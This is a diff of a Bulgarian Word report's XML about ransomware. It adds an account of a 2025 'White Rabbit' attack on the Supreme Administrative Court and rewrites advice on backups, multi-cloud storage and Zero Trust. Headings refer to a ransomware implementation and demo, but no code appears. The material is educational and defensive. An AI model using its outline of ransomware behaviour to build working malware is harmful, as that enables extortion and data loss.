             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
@@ -3513,13 +3482,11 @@
           <w:r>
             <w:rPr>
               <w:noProof/>
-              <w:highlight w:val="yellow"/>
             </w:rPr>
             <w:t>[3]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
-              <w:highlight w:val="yellow"/>
               <w:lang w:val="en-US"/>
             </w:rPr>
             <w:fldChar w:fldCharType="end"/>
@@ -3536,7 +3503,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc223545522"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc223896479"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Еволюция на </w:t>
@@ -3563,7 +3530,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc223545523"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc223896480"/>
       <w:r>
         <w:t xml:space="preserve">Ранна фаза на </w:t>
       </w:r>
@@ -3904,7 +3871,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc223545524"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc223896481"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4589,7 +4556,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc223545525"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc223896482"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4862,15 +4829,7 @@
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> че файловете, които се криптират се запазват на нова локация, а </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>некриптираните</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> се изтриват. </w:t>
+        <w:t xml:space="preserve"> че файловете, които се криптират се запазват на нова локация, а некриптираните се изтриват. </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5170,7 +5129,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc223545526"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc223896483"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -5499,7 +5458,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc223545527"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc223896484"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -5843,11 +5802,9 @@
       <w:r>
         <w:t xml:space="preserve"> изтегляне на </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>неверифицирани</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> файлове през</w:t>
       </w:r>
@@ -5932,11 +5889,238 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc223545528"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc223896485"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> в България</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="15"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">През 2025 г. Върховният административен съд на България (ВАС) става жертва на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>рансъмуер</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> атака, известна още като: „</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>White Rabbit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(бял заек).</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> „Белият заек“ е малък по-размер (около 100</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> KB</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">) и не е </w:t>
+      </w:r>
+      <w:r>
+        <w:t>при</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">хванат от антивирусната система. За да започне </w:t>
+      </w:r>
+      <w:r>
+        <w:t>атаката</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> трябва да бъде въведена парола, която е известна само на хакерите.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">При активиране, криптира файловете, изключва системните папки на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и уведомява потребителите, че са обект на атака.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Атаката срива за седмици единната деловодна информационна система, използвана от всички административни съдилища по страната. Причина за атаката е най-вероятно човешка грешка – отваряне на съмнителен имейл, след което вируса се разпространява из цялата мрежа, оставайки незабелязан. Киберпрестъпниците успяват да криптира голяма част от наличната информация. Прилагат и двойно изнудване в биткойн – откуп едновременно за декриптиране и за непубликуваното на информацията в интернета. Единствените устройства, които остават невредими са тези, които не са били включени в интернет мрежата.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Не е известно дали ВАС е заплатил откупа, но Висшият съ</w:t>
+      </w:r>
+      <w:r>
+        <w:t>д</w:t>
+      </w:r>
+      <w:r>
+        <w:t>е</w:t>
+      </w:r>
+      <w:r>
+        <w:t>б</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ен съвет гласува близо 1.6 млн. лева за закупуването на нови </w:t>
+      </w:r>
+      <w:r>
+        <w:t>сървъри</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="1325554063"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Чов25 \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[9]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="-799767334"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> CITATION Бял30 \l 1033 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:t>[10]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="1973169161"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> CITATION Бял \l 1033 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:t>[11]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="_Toc223896486"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Ролята на </w:t>
@@ -5959,7 +6143,7 @@
       <w:r>
         <w:t xml:space="preserve"> атаките</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:r>
@@ -5974,8 +6158,13 @@
         </w:rPr>
         <w:t>R</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ansomware. Както </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ansomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Както </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6142,7 +6331,7 @@
               <w:noProof/>
               <w:lang w:val="en-US"/>
             </w:rPr>
-            <w:t>[9]</w:t>
+            <w:t>[12]</w:t>
           </w:r>
           <w:r>
             <w:fldChar w:fldCharType="end"/>
@@ -6183,8 +6372,13 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Полиморфен </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Полиморфен</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6415,7 +6609,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc223545529"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc223896487"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Имплементация на </w:t>
@@ -6426,7 +6620,7 @@
         </w:rPr>
         <w:t>Ransomware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:r>
@@ -6772,7 +6966,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc223382614"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc223382614"/>
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
@@ -6829,7 +7023,7 @@
         </w:rPr>
         <w:t>pom.xml</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="18"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -7239,7 +7433,7 @@
               <w:noProof/>
               <w:lang w:val="en-US"/>
             </w:rPr>
-            <w:t>[10]</w:t>
+            <w:t>[13]</w:t>
           </w:r>
           <w:r>
             <w:rPr>
@@ -8091,7 +8285,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc223545530"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc223896488"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Демонстрация на </w:t>
@@ -8102,17 +8296,17 @@
         </w:rPr>
         <w:t>Ransomware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc223545531"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc223896489"/>
       <w:r>
         <w:t>Съдържание на текстовите файлове преди криптирането:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8274,11 +8468,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc223545532"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc223896490"/>
       <w:r>
         <w:t>Стартиране на демото:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8677,7 +8871,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc223545533"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc223896491"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Потърпевшият </w:t>
@@ -8685,7 +8879,7 @@
       <w:r>
         <w:t>е заплатил откупа:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8991,7 +9185,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc223545534"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc223896492"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -9002,7 +9196,7 @@
       <w:r>
         <w:t xml:space="preserve"> към имплементацията:</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="23"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9075,7 +9269,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc223545535"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc223896493"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Стратегии и защита от </w:t>
@@ -9086,7 +9280,7 @@
         </w:rPr>
         <w:t>ransomware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="24"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9096,7 +9290,7 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc223545536"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc223896494"/>
       <w:r>
         <w:t xml:space="preserve">Подготовка за </w:t>
       </w:r>
@@ -9109,115 +9303,29 @@
       <w:r>
         <w:t xml:space="preserve"> инциденти</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="24"/>
+      <w:bookmarkEnd w:id="25"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Подготовката включва с</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>ъздаване и поддържка</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> на офлайн криптирани </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>backups</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> на критично важната информация и чест</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>а</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> проверка на изправността на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>backup</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>. От съществено значение</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> backup</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> да се поддържа офлайн</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, понеже повечето </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ransom</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> атаки опитват да намерят и изтрият или криптират резервни</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>те</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> копия на системата. Така се принуждава жертвата да плати откупа. </w:t>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Подготовката включва създаване и поддържане на офлайн криптирани резервни копия на критично важната информация, както и редовна проверка на тяхната изправност. От съществено значение е резервните копия да се съхраняват офлайн, тъй като повечето </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> атаки се опитват да открият и унищожат или криптират наличните архиви на системата, с което принуждават </w:t>
+      </w:r>
+      <w:r>
+        <w:t>потърпевшия</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> да плати откуп.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9226,62 +9334,16 @@
         <w:ind w:firstLine="709"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Поддръжка и ъпдейт на</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
+        <w:t xml:space="preserve">Важно е също така да се поддържат актуални </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>images</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> на системата. Поддържането на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>image</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, които имат специфична преконфигурирана операционна система и свързаните с нея софтуерни приложения е важно, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>тъй като</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> по-лесно ще може да бъде възстановена системата и деплойната.</w:t>
+        <w:t xml:space="preserve"> на системата със предварително конфигурирана операционна система и съответните софтуерни приложения. Това значително улеснява и ускорява възстановяването и повторното пускане в експлоатация на системата след атака.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9293,147 +9355,130 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Поддържане на резервен хардуер, който да бъде използван при необходимост </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>за</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> възстановяване на системите. Това позволява по-бързо възстановяване на дейността, ако възстановяването на основната инфраструктура не е желано или не е възможно.</w:t>
+        <w:t>Препоръчително е и поддържането на резервен хардуер, който да бъде използван при нужда. Това позволява по-бързо възобновяване на дейността в случаите, когато възстановяването на основната инфраструктура е нежелано или невъзможно</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
-      </w:pPr>
-      <w:r>
-        <w:t>…</w:t>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Използване на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>multi-cloud solution</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е подходящо, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>защото</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> може да се съхранява важна информация или резервни копия на системата</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Това добавя</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> още един слой защита. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Multi-cloud</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е препоръчителен, тъй като намалява риска от </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vendor lock-in</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> или с други думи организацията не зависи само от един доставчик на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cloud</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>В случай че всички акаунти или услуги при даден облачен доставчик бъдат компрометирани, наличието на резервна инфраструктура при алтернативен доставчик позволява по-бързо възстановяване на системите.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Използване на</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Една от ключовите мерки за защита е въвеждането на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Zero</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>multi-cloud solution</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> е подходящо, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>защото</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> може да се съхранява важна информация или резервни копия на системата</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. Това добавя</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> още един слой защита. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Multi-cloud</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> е препоръчителен, тъй като намалява риска от </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>vendor lock-in</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> или с други думи организацията не зависи само от един доставчик на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>cloud</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Trust</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Architecture</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (ZTA), която не допуска неоторизиран достъп до данни и услуги</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
-        <w:t>В случай че всички акаунти или услуги при даден облачен доставчик бъдат компрометирани, наличието на резервна инфраструктура при алтернативен доставчик позволява по-бързо възстановяване на системите.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Имплементация на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Zero Trust Architecture (ZTA)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> за превенция на неоторизиран достъп до данни и услуги.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Достъпът до данните трябва да бъде възможно най-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>гранулярен</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Тоест </w:t>
+        <w:t xml:space="preserve">Достъпът до данните трябва да бъде възможно най-гранулярен. Тоест </w:t>
       </w:r>
       <w:r>
         <w:t>необходимо е създаването на различни роли, които дават правомощия към определени данни и за определен срок. Така се избягва</w:t>
@@ -9505,7 +9550,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
